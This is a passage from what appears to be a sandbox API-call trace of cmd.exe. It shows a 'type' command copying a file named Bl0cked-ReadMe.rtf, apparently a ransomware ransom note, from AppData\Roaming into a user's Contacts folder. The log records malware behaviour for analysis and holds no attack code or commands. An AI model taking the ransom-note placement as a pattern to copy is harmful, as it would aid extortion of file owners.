(in: lpName="COMSPEC", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.059] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0218.059] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0218.059] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0218.059] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0218.059] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0218.059] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0218.059] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0218.059] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0218.059] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0218.059] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f508 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0218.059] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24f508, lpFilePart=0x24f504 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f504*="Desktop") returned 0x18 [0218.059] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0218.059] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f284 | out: lpFindFileData=0x24f284) returned 0x3afff8 [0218.059] FindClose (in: hFindFile=0x3afff8 | out: hFindFile=0x3afff8) returned 1 [0218.059] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f284 | out: lpFindFileData=0x24f284) returned 0x3afff8 [0218.060] FindClose (in: hFindFile=0x3afff8 | out: hFindFile=0x3afff8) returned 1 [0218.060] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f284 | out: lpFindFileData=0x24f284) returned 0x3afff8 [0218.060] FindClose (in: hFindFile=0x3afff8 | out: hFindFile=0x3afff8) returned 1 [0218.060] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0218.060] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0218.060] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0218.060] GetEnvironmentStringsW () returned 0x3b2ad8* [0218.060] FreeEnvironmentStringsW (penv=0x3b2ad8) returned 1 [0218.060] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ff5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0218.061] GetConsoleOutputCP () returned 0x1b5 [0218.061] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0218.061] GetUserDefaultLCID () returned 0x409 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ff4950, cchData=8 | out: lpLCData=":") returned 2 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f648, cchData=128 | out: lpLCData="0") returned 2 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f648, cchData=128 | out: lpLCData="0") returned 2 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f648, cchData=128 | out: lpLCData="1") returned 2 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49ff4940, cchData=8 | out: lpLCData="/") returned 2 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49ff4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49ff4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49ff4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49ff4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49ff4c80, cchData=32 | out: lpLCData="Fri") 
returned 4 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49ff4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49ff4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ff4930, cchData=8 | out: lpLCData=".") returned 2 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49ff4920, cchData=8 | out: lpLCData=",") returned 2 [0218.062] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0218.063] GetConsoleTitleW (in: lpConsoleTitle=0x3a08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.063] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0218.063] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0218.063] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0218.063] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0218.064] _wcsicmp (_String1="type", _String2=")") returned 75 [0218.064] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0218.064] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0218.064] _wcsicmp (_String1="IF", _String2="type") returned -11 [0218.064] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0218.064] _wcsicmp (_String1="REM", _String2="type") returned -2 [0218.064] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0218.067] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.067] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.068] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.068] GetFileType (hFile=0x7) returned 0x2 [0218.068] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0218.068] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f540 | out: lpMode=0x24f540) returned 1 [0218.068] _dup (_FileHandle=1) returned 3 [0218.068] 
_close (_FileHandle=1) returned 0 [0218.068] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Contacts\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0218.069] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\contacts\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x24f510, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0218.070] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0218.070] GetConsoleTitleW (in: lpConsoleTitle=0x24f340, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.070] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0218.070] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0218.070] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0218.070] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0218.071] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ff5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0218.071] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x24eea4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24eea4) returned 0x3a0e50 [0218.071] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0218.071] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0218.071] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0218.071] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x24ddb0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0218.071] 
_open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0218.071] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.071] GetFileType (hFile=0x54) returned 0x1 [0218.072] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.072] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x24de08 | out: lpFileSizeHigh=0x24de08*=0x0) returned 0x1632 [0218.072] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.072] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0218.072] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.072] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x200, lpOverlapped=0x0) returned 1 [0218.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.072] GetFileType (hFile=0x4c) returned 0x1 [0218.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.072] GetFileType (hFile=0x4c) returned 0x1 [0218.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.072] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.073] GetFileType (hFile=0x4c) returned 0x1 [0218.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.073] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec90*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.073] GetFileType (hFile=0x4c) returned 0x1 [0218.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.073] WriteFile (in: hFile=0x4c, lpBuffer=0x24ece0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, 
lpOverlapped=0x0 | out: lpBuffer=0x24ece0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.073] GetFileType (hFile=0x4c) returned 0x1 [0218.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.073] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed30*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.073] GetFileType (hFile=0x4c) returned 0x1 [0218.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.073] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed80*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.073] GetFileType (hFile=0x4c) returned 0x1 [0218.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.073] WriteFile (in: hFile=0x4c, lpBuffer=0x24edd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24edd0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] GetFileType (hFile=0x4c) returned 0x1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] WriteFile (in: hFile=0x4c, lpBuffer=0x24ee20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ee20*, lpNumberOfBytesWritten=0x24de24*=0x20, lpOverlapped=0x0) returned 1 [0218.074] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.074] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.074] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.074] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x200, lpOverlapped=0x0) returned 1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] GetFileType (hFile=0x4c) returned 0x1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] GetFileType (hFile=0x4c) returned 0x1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] GetFileType (hFile=0x4c) returned 0x1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec90*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] GetFileType (hFile=0x4c) returned 0x1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] WriteFile (in: hFile=0x4c, lpBuffer=0x24ece0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ece0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] GetFileType (hFile=0x4c) returned 0x1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed30*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] GetFileType (hFile=0x4c) returned 0x1 [0218.074] _get_osfhandle (_FileHandle=1) returned 
0x4c [0218.074] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed80*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] GetFileType (hFile=0x4c) returned 0x1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] WriteFile (in: hFile=0x4c, lpBuffer=0x24edd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24edd0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] GetFileType (hFile=0x4c) returned 0x1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] WriteFile (in: hFile=0x4c, lpBuffer=0x24ee20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ee20*, lpNumberOfBytesWritten=0x24de24*=0x20, lpOverlapped=0x0) returned 1 [0218.075] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.075] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.075] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.075] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x200, lpOverlapped=0x0) returned 1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] GetFileType (hFile=0x4c) returned 0x1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] GetFileType (hFile=0x4c) returned 0x1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) 
returned 1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] GetFileType (hFile=0x4c) returned 0x1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec90*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] GetFileType (hFile=0x4c) returned 0x1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] WriteFile (in: hFile=0x4c, lpBuffer=0x24ece0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ece0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] GetFileType (hFile=0x4c) returned 0x1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed30*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] GetFileType (hFile=0x4c) returned 0x1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed80*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] GetFileType (hFile=0x4c) returned 0x1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] WriteFile (in: hFile=0x4c, lpBuffer=0x24edd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24edd0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.076] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0218.076] GetFileType (hFile=0x4c) returned 0x1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] WriteFile (in: hFile=0x4c, lpBuffer=0x24ee20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ee20*, lpNumberOfBytesWritten=0x24de24*=0x20, lpOverlapped=0x0) returned 1 [0218.076] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.076] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.076] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.076] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x200, lpOverlapped=0x0) returned 1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] GetFileType (hFile=0x4c) returned 0x1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] GetFileType (hFile=0x4c) returned 0x1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] GetFileType (hFile=0x4c) returned 0x1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec90*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] GetFileType (hFile=0x4c) returned 0x1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] WriteFile (in: hFile=0x4c, lpBuffer=0x24ece0*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ece0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] GetFileType (hFile=0x4c) returned 0x1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed30*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] GetFileType (hFile=0x4c) returned 0x1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed80*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] GetFileType (hFile=0x4c) returned 0x1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] WriteFile (in: hFile=0x4c, lpBuffer=0x24edd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24edd0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] GetFileType (hFile=0x4c) returned 0x1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] WriteFile (in: hFile=0x4c, lpBuffer=0x24ee20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ee20*, lpNumberOfBytesWritten=0x24de24*=0x20, lpOverlapped=0x0) returned 1 [0218.077] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.077] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.077] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.077] ReadFile 
(in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x200, lpOverlapped=0x0) returned 1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] GetFileType (hFile=0x4c) returned 0x1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] GetFileType (hFile=0x4c) returned 0x1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] GetFileType (hFile=0x4c) returned 0x1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec90*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] GetFileType (hFile=0x4c) returned 0x1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] WriteFile (in: hFile=0x4c, lpBuffer=0x24ece0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ece0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] GetFileType (hFile=0x4c) returned 0x1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed30*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] GetFileType (hFile=0x4c) returned 0x1 [0218.077] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed80*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] GetFileType (hFile=0x4c) returned 0x1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] WriteFile (in: hFile=0x4c, lpBuffer=0x24edd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24edd0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] GetFileType (hFile=0x4c) returned 0x1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] WriteFile (in: hFile=0x4c, lpBuffer=0x24ee20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ee20*, lpNumberOfBytesWritten=0x24de24*=0x20, lpOverlapped=0x0) returned 1 [0218.078] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.078] SetFilePointerEx (in: 